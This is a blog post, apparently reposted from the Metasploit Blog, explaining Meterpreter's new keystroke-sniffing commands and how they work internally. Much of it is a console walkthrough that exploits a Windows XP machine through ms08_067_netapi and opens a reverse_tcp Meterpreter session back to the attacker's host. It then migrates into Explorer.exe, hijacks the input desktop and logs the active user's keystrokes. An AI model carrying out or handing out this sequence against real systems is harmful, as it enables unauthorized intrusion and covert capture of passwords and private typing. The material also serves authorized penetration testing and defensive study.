Using Meterpreter For Remote Keystroke Sniffing

The development version of Metasploit now allows keystroke sniffing through Meterpreter sessions. This has been implemented as set of new commands for the stdapi extension of Meterpreter.

This works with the help of the keyscan_start command, which spawns a new thread inside of the process where Meterpreter was injected and this thread in turn allocates a large 1Mb buffer to store captured keystrokes. Every 30 ms, this thread calls GetAsyncKeyState, which returns the up/down status of each of the 256 possible Virtual Key Codes. If a key state change is detected and the new state is down, the key, along with the Shift, Control, and Alt flags are stored into the buffer which overwrites the old entries when full.

One limitation of the GetAsyncKeyState function is that it must have access to the active, input desktop in order to monitor the key states, which presents a problem when the target process is running as a service. This sequence has now been implemented as the grabdesktop command, but this is still not sufficient in many cases – for example if the service does not have rights to interact with the desktop, no amount of API jumping allows the GetAsyncKeyState function to receive keystrokes from the user.

Fortunately, Meterpreter supports the migrate command, which allows us to move our running code into a process that does have interactive access to the desktop. In the example below, we will use ms08_067_netapi exploit to obtain a Meterpreter shell on a Windows XP SP2 system, then migrate the running payload into the Explorer.exe process owned by the active user. This allows us to then use the keyscan_start and keyscan_dump commands to log the user’s keystrokes.

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST

msf exploit(ms08_067_netapi) > set TARGET 3

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list

PID Name Path
— —- —-
292 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
316 Explorer.EXE C:WINDOWSExplorer.EXE
356 smss.exe SystemRootSystem32smss.exe
416 csrss.exe ??C:WINDOWSsystem32csrss.exe
440 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
[ snip ]

meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.

meterpreter > getpid
Current pid: 316

meterpreter > grabdesktop
Trying to hijack the input desktop…

meterpreter > keyscan_start
Starting the keystroke sniffer…

meterpreter > keyscan_dump
Dumping captured keystrokes…

Source: Metasploit Blog

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>